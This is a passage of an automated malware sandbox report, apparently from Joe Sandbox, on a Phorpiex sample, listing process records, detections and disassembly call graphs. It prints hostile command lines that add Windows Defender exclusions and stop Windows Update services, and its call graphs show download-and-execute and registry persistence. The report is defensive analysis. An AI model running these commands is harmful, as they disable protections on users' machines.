                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:06:11:16
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                  Imagebase:0xf70000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop UsoSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop WaaSMedicSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop wuauserv
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop DoSvc
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:06:11:17
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:sc stop BITS /wait
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:61'440 bytes
                                                                                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:06:11:19
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                  File size:496'640 bytes
                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:06:11:26
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:18
                                                                                                                                  Start time:06:11:28
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\818921588.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\818921588.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:45.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:43.9%
                                                                                                                                    Total number of Nodes:98
                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                    execution_graph 303 4b1de8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 304 4b1eda GetCurrentProcess TerminateProcess 303->304 305 4b1ed2 _crt_debugger_hook 303->305 305->304 306 4b19a1 307 4b19dd 306->307 309 4b19b3 306->309 308 4b19d8 ?terminate@ 308->307 309->307 309->308 316 4b1691 321 4b1a9d 316->321 319 4b16ce _amsg_exit 320 4b16d6 319->320 324 4b19f8 321->324 323 4b1696 __getmainargs 323->319 323->320 331 4b1c6c 324->331 326 4b1a04 _decode_pointer 327 4b1a1b _onexit 326->327 328 4b1a27 7 API calls 326->328 329 4b1a8b __onexit 327->329 332 4b1a94 _unlock 328->332 329->323 331->326 332->329 333 4b1851 _XcptFilter 245 4b16d7 266 4b1c6c 245->266 247 4b16e3 GetStartupInfoA 248 4b1711 InterlockedCompareExchange 247->248 249 4b171f 248->249 250 4b1723 248->250 249->250 251 4b172a Sleep 249->251 252 4b174d 250->252 253 4b1743 _amsg_exit 250->253 251->248 254 4b1776 252->254 255 4b1756 _initterm_e 252->255 253->254 256 4b17a0 254->256 257 4b1785 _initterm 254->257 255->254 259 4b1771 __onexit 255->259 258 4b17a4 InterlockedExchange 256->258 261 4b17ac __IsNonwritableInCurrentImage 256->261 257->256 258->261 260 4b183b _ismbblead 260->261 261->260 263 4b1880 261->263 264 4b1825 exit 261->264 267 4b10b0 Sleep 261->267 263->259 265 4b1889 _cexit 263->265 264->261 265->259 266->247 268 4b10e0 DeleteFileW FindWindowA 267->268 269 4b1100 DeleteFileW 268->269 270 4b10f4 MoveFileW 268->270 269->268 271 4b110c 269->271 270->269 272 4b1324 LoadLibraryA 271->272 273 4b166b 272->273 274 4b133e 272->274 273->261 275 4b1348 LoadLibraryA 274->275 275->273 276 4b135c 275->276 277 4b1369 LoadLibraryA 276->277 277->273 278 4b137b 277->278 279 4b1388 LoadLibraryA 278->279 279->273 280 4b139a 279->280 281 4b13a4 GetProcAddress 280->281 281->273 282 4b13bb 281->282 283 4b13c8 GetProcAddress 282->283 283->273 284 4b13d9 283->284 285 4b13e6 GetProcAddress 284->285 285->273 286 4b13fd 285->286 287 4b140a GetProcAddress 286->287 287->273 288 4b141f GetTickCount srand 287->288 289 4b1435 288->289 289->289 290 4b1447 mbstowcs 289->290 291 4b1477 290->291 291->291 292 4b1497 mbstowcs wsprintfW PathFileExistsW 291->292 293 4b1649 FreeLibrary FreeLibrary FreeLibrary FreeLibrary 292->293 294 4b14e7 292->294 293->273 294->294 295 4b1507 mbstowcs 294->295 296 4b1537 295->296 296->296 297 4b1557 mbstowcs rand wsprintfW 296->297 298 4b15b0 297->298 299 4b15c7 mbstowcs 298->299 300 4b15ea 299->300 301 4b15fb mbstowcs URLDownloadToFileW 300->301 301->293 302 4b1630 ShellExecuteW 301->302 302->293 334 4b1997 337 4b1d18 334->337 336 4b199c 336->336 338 4b1d4a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 337->338 339 4b1d3d 337->339 340 4b1d41 338->340 339->338 339->340 340->336 341 4b18b6 343 4b18c4 __set_app_type _encode_pointer __p__fmode __p__commode 341->343 344 4b1963 _pre_c_init __RTC_Initialize 343->344 345 4b197d 344->345 346 4b1971 __setusermatherr 344->346 351 4b1cea _controlfp_s 345->351 346->345 349 4b198b _configthreadlocale 350 4b1994 349->350 352 4b1982 351->352 353 4b1d06 _invoke_watson 351->353 352->349 352->350 353->352 310 4b1cc5 _except_handler4_common 311 4b1865 312 4b1879 _exit 311->312 313 4b1880 311->313 312->313 314 4b1889 _cexit 313->314 315 4b188f __onexit 313->315 314->315

                                                                                                                                    Callgraph

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004B10B0 Relevance: 68.7, APIs: 31, Strings: 8, Instructions: 403libraryloaderfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 004B10BF
                                                                                                                                    • DeleteFileW.KERNELBASE(778g87b7b8787b7), ref: 004B10E5
                                                                                                                                    • FindWindowA.USER32(778g87b7b8787b7,00000000), ref: 004B10EE
                                                                                                                                    • MoveFileW.KERNEL32(778g87b7b8787b7,778g87b7b8787b7), ref: 004B10FE
                                                                                                                                    • DeleteFileW.KERNELBASE(778g87b7b8787b7778g87b7b8787b7), ref: 004B1105
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B132E
                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 004B134C
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B136D
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 004B138C
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004B13AF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004B13CD
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004B13EF
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004B1413
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004B141F
                                                                                                                                    • srand.MSVCR90 ref: 004B1426
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1458
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B14A8
                                                                                                                                    • wsprintfW.USER32 ref: 004B14D0
                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 004B14DD
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1518
                                                                                                                                    • mbstowcs.MSVCR90 ref: 004B1568
                                                                                                                                    • rand.MSVCR90 ref: 004B1578
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1807312821.00000000004B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1807296218.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1807329261.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1807343166.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4b0000_Bjl3geiFEK.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressFileLibraryLoadProcmbstowcs$Delete$CountExistsFindMovePathSleepTickWindowrandsrandwsprintf
                                                                                                                                    • String ID: "K$%s\%d%s$%s\%s$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7$778g87b7b8787b7778g87b7b8787b7
                                                                                                                                    • API String ID: 2649378626-1968070415
                                                                                                                                    • Opcode ID: 05af62771ce60b95c3cf359e96dcec27e4704eba9465244f88f31c32785f2443
                                                                                                                                    • Instruction ID: 5074f222bf24171671938b51c012338d793ee46f101870637a2272c7b73c1ac7
                                                                                                                                    • Opcode Fuzzy Hash: 05af62771ce60b95c3cf359e96dcec27e4704eba9465244f88f31c32785f2443
                                                                                                                                    • Instruction Fuzzy Hash: B7F131B55083419BC324DF68DD50AEBB7E9AF88344F448A2EF589C3361EB74D504CB6A

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:17.5%
                                                                                                                                    Total number of Nodes:1501
                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                    execution_graph 4451 407940 Sleep CreateMutexA GetLastError 4452 407976 ExitProcess 4451->4452 4453 40797e 6 API calls 4451->4453 4454 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4453->4454 4455 407a23 4453->4455 4456 407dcb RegOpenKeyExW 4454->4456 4457 407d9f RegSetValueExW RegCloseKey 4454->4457 4530 40f1b0 GetLocaleInfoA strcmp 4455->4530 4459 407e24 RegOpenKeyExW 4456->4459 4460 407df8 RegSetValueExW RegCloseKey 4456->4460 4457->4456 4462 407e51 RegSetValueExW RegCloseKey 4459->4462 4463 407e7d RegOpenKeyExW 4459->4463 4460->4459 4462->4463 4468 407ed6 RegOpenKeyExW 4463->4468 4469 407eaa RegSetValueExW RegCloseKey 4463->4469 4464 407a30 ExitProcess 4465 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4466 407b36 Sleep wsprintfW CopyFileW 4465->4466 4467 407a8c SetFileAttributesW RegOpenKeyExW 4465->4467 4473 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4466->4473 4474 407b7e SetFileAttributesW RegOpenKeyExW 4466->4474 4467->4466 4472 407ac8 wcslen RegSetValueExW 4467->4472 4470 407f03 RegSetValueExW RegCloseKey 4468->4470 4471 407f2f RegOpenKeyExW 4468->4471 4469->4468 4470->4471 4476 407f88 RegOpenKeyExW 4471->4476 4477 407f5c RegSetValueExW RegCloseKey 4471->4477 4478 407b29 RegCloseKey 4472->4478 4479 407afd RegCloseKey 4472->4479 4473->4454 4475 407c87 SetFileAttributesW RegOpenKeyExW 4473->4475 4474->4473 4480 407bba wcslen RegSetValueExW 4474->4480 4475->4454 4481 407cc3 wcslen RegSetValueExW 4475->4481 4483 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4476->4483 4484 40801f RegOpenKeyExW 4476->4484 4477->4476 4478->4466 4532 40f400 memset memset CreateProcessW 4479->4532 4485 407c1b RegCloseKey 4480->4485 4486 407bef RegCloseKey 4480->4486 4487 407d24 RegCloseKey 4481->4487 4488 407cf8 RegCloseKey 4481->4488 4483->4484 4490 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4484->4490 4491 4080d9 RegOpenKeyExW 4484->4491 4485->4473 4492 40f400 6 API calls 4486->4492 4487->4454 4493 40f400 6 API calls 4488->4493 4490->4491 4495 4081f0 RegOpenKeyExW 4491->4495 4496 40810a 8 API calls 4491->4496 4497 407c08 4492->4497 4498 407d11 4493->4498 4494 407b21 ExitProcess 4499 408221 8 API calls 4495->4499 4500 408307 Sleep 4495->4500 4496->4495 4497->4485 4501 407c13 ExitProcess 4497->4501 4498->4487 4502 407d1c ExitProcess 4498->4502 4499->4500 4538 40d180 4500->4538 4505 408322 9 API calls 4541 405c00 InitializeCriticalSection CreateFileW 4505->4541 5364 4077f0 4505->5364 5371 4058c0 4505->5371 5380 406f70 Sleep GetModuleFileNameW 4505->5380 4508 40848e 4512 4083d7 CreateEventA 4573 40c8b0 4512->4573 4521 40dbe0 17 API calls 4522 408438 4521->4522 4523 40dbe0 17 API calls 4522->4523 4524 408453 4523->4524 4525 40dbe0 17 API calls 4524->4525 4526 40846f 4525->4526 4618 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4526->4618 4528 408480 4627 40de90 4528->4627 4531 407a28 4530->4531 4531->4464 4531->4465 4533 40f471 ShellExecuteW 4532->4533 4534 40f462 Sleep 4532->4534 4536 40f4a6 4533->4536 4537 40f497 Sleep 4533->4537 4535 407b16 4534->4535 4535->4478 4535->4494 4536->4535 4537->4535 4636 40d150 4538->4636 4542 405d25 4541->4542 4543 405c38 CreateFileMappingW 4541->4543 4555 40e0c0 CoInitializeEx 4542->4555 4544 405c59 MapViewOfFile 4543->4544 4545 405d1b CloseHandle 4543->4545 4546 405d11 CloseHandle 4544->4546 4547 405c78 GetFileSize 4544->4547 4545->4542 4546->4545 4551 405c8d 4547->4551 4548 405d07 UnmapViewOfFile 4548->4546 4549 405c9c 4549->4548 4551->4548 4551->4549 4552 405ccc 4551->4552 4765 40d1d0 4551->4765 4772 405d30 4551->4772 4553 40ab60 __aligned_recalloc_base 3 API calls 4552->4553 4553->4549 5078 40e190 socket 4555->5078 4557 4083d2 4568 407390 CoInitializeEx SysAllocString 4557->4568 4558 40e168 5122 40ac80 4558->5122 4561 40e12a 5103 40b430 htons 4561->5103 4562 40e0e0 4562->4557 4562->4558 4562->4561 5088 40e400 4562->5088 4567 40eef0 24 API calls 4567->4558 4569 4073b2 4568->4569 4570 4073c8 CoUninitialize 4568->4570 5267 4073e0 4569->5267 4570->4512 5276 40c870 4573->5276 4576 40c870 3 API calls 4577 40c8ce 4576->4577 4578 40c870 3 API calls 4577->4578 4579 40c8de 4578->4579 4580 40c870 3 API calls 4579->4580 4581 4083ef 4580->4581 4582 40dbb0 4581->4582 4583 40a740 7 API calls 4582->4583 4584 40dbbb 4583->4584 4585 4083f9 4584->4585 4586 40dbc7 InitializeCriticalSection 4584->4586 4587 40bc70 InitializeCriticalSection 4585->4587 4586->4585 4592 40bc8a 4587->4592 4588 40bcb9 CreateFileW 4590 40bce0 CreateFileMappingW 4588->4590 4591 40bda2 4588->4591 4594 40bd01 MapViewOfFile 4590->4594 4595 40bd98 CloseHandle 4590->4595 5332 40b510 EnterCriticalSection 4591->5332 4592->4588 5283 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4592->5283 5284 40b850 4592->5284 4596 40bd1c GetFileSize 4594->4596 4597 40bd8e CloseHandle 4594->4597 4595->4591 4604 40bd3b 4596->4604 4597->4595 4599 40bda7 4600 40dbe0 17 API calls 4599->4600 4601 408403 4600->4601 4606 40dbe0 4601->4606 4602 40bd84 UnmapViewOfFile 4602->4597 4604->4602 4605 40b850 32 API calls 4604->4605 5331 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4604->5331 4605->4604 4607 40dbf7 EnterCriticalSection 4606->4607 4608 40841c 4606->4608 5359 40dcd0 4607->5359 4608->4521 4611 40dcbb LeaveCriticalSection 4611->4608 4612 40a990 9 API calls 4613 40dc39 4612->4613 4613->4611 4614 40dc4b CreateThread 4613->4614 4614->4611 4615 40dc6e 4614->4615 4616 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4615->4616 4617 40dcb4 4615->4617 4616->4617 4617->4611 4619 40dd86 InterlockedExchangeAdd 4618->4619 4620 40de69 GetCurrentThread SetThreadPriority 4618->4620 4619->4620 4621 40dda0 4619->4621 4620->4528 4621->4620 4622 40ddb9 EnterCriticalSection 4621->4622 4623 40de27 LeaveCriticalSection 4621->4623 4624 40de03 WaitForSingleObject 4621->4624 4625 40de3e 4621->4625 4626 40de5c Sleep 4621->4626 4622->4621 4623->4621 4623->4625 4624->4621 4625->4620 4626->4621 4628 40df12 4627->4628 4629 40de9c EnterCriticalSection 4627->4629 4628->4508 4630 40deb8 4629->4630 4631 40dee0 LeaveCriticalSection DeleteCriticalSection 4630->4631 4632 40decb CloseHandle 4630->4632 4633 40ab60 __aligned_recalloc_base 3 API calls 4631->4633 4632->4630 4634 40df06 4633->4634 4635 40ab60 __aligned_recalloc_base 3 API calls 4634->4635 4635->4628 4639 40cda0 4636->4639 4640 40cdd3 4639->4640 4641 40cdbe 4639->4641 4642 408317 4640->4642 4671 40cf80 4640->4671 4645 40ce00 4641->4645 4642->4505 4642->4508 4646 40ceb2 4645->4646 4647 40ce29 4645->4647 4649 40a740 7 API calls 4646->4649 4666 40ceaa 4646->4666 4647->4666 4705 40a740 4647->4705 4651 40ced8 4649->4651 4653 402420 7 API calls 4651->4653 4651->4666 4655 40cf05 4653->4655 4657 4024e0 10 API calls 4655->4657 4659 40cf1f 4657->4659 4658 40ce7f 4660 402420 7 API calls 4658->4660 4662 402420 7 API calls 4659->4662 4661 40ce90 4660->4661 4663 4024e0 10 API calls 4661->4663 4664 40cf30 4662->4664 4663->4666 4665 4024e0 10 API calls 4664->4665 4667 40cf4a 4665->4667 4666->4642 4668 402420 7 API calls 4667->4668 4669 40cf5b 4668->4669 4670 4024e0 10 API calls 4669->4670 4670->4666 4672 40cfa9 4671->4672 4673 40d05a 4671->4673 4674 40d052 4672->4674 4675 40a740 7 API calls 4672->4675 4673->4674 4677 40a740 7 API calls 4673->4677 4674->4642 4676 40cfbf 4675->4676 4676->4674 4679 402420 7 API calls 4676->4679 4678 40d07e 4677->4678 4678->4674 4681 402420 7 API calls 4678->4681 4680 40cfe3 4679->4680 4682 40a740 7 API calls 4680->4682 4683 40d0a2 4681->4683 4684 40cff2 4682->4684 4685 40a740 7 API calls 4683->4685 4686 4024e0 10 API calls 4684->4686 4687 40d0b1 4685->4687 4688 40d01b 4686->4688 4689 4024e0 10 API calls 4687->4689 4690 40ab60 __aligned_recalloc_base 3 API calls 4688->4690 4691 40d0da 4689->4691 4692 40d027 4690->4692 4693 40ab60 __aligned_recalloc_base 3 API calls 4691->4693 4694 402420 7 API calls 4692->4694 4695 40d0e6 4693->4695 4696 40d038 4694->4696 4697 402420 7 API calls 4695->4697 4698 4024e0 10 API calls 4696->4698 4699 40d0f7 4697->4699 4698->4674 4700 4024e0 10 API calls 4699->4700 4701 40d111 4700->4701 4702 402420 7 API calls 4701->4702 4703 40d122 4702->4703 4704 4024e0 10 API calls 4703->4704 4704->4674 4716 40a760 4705->4716 4708 402420 4737 40a950 4708->4737 4713 4024e0 4744 402540 4713->4744 4715 4024ff _invalid_parameter 4715->4658 4725 40a800 GetCurrentProcessId 4716->4725 4718 40a76b 4719 40a777 __aligned_recalloc_base 4718->4719 4726 40a820 4718->4726 4721 40a74e 4719->4721 4722 40a792 HeapAlloc 4719->4722 4721->4666 4721->4708 4722->4721 4723 40a7b9 __aligned_recalloc_base 4722->4723 4723->4721 4724 40a7d4 memset 4723->4724 4724->4721 4725->4718 4734 40a800 GetCurrentProcessId 4726->4734 4728 40a829 4729 40a846 HeapCreate 4728->4729 4735 40a890 GetProcessHeaps 4728->4735 4731 40a860 HeapSetInformation GetCurrentProcessId 4729->4731 4732 40a887 4729->4732 4731->4732 4732->4719 4734->4728 4736 40a83c 4735->4736 4736->4729 4736->4732 4738 40a760 __aligned_recalloc_base 7 API calls 4737->4738 4739 40242b 4738->4739 4740 402820 4739->4740 4741 40282a 4740->4741 4742 40a950 __aligned_recalloc_base 7 API calls 4741->4742 4743 402438 4742->4743 4743->4713 4745 40258e 4744->4745 4746 402551 4744->4746 4745->4746 4747 40a950 __aligned_recalloc_base 7 API calls 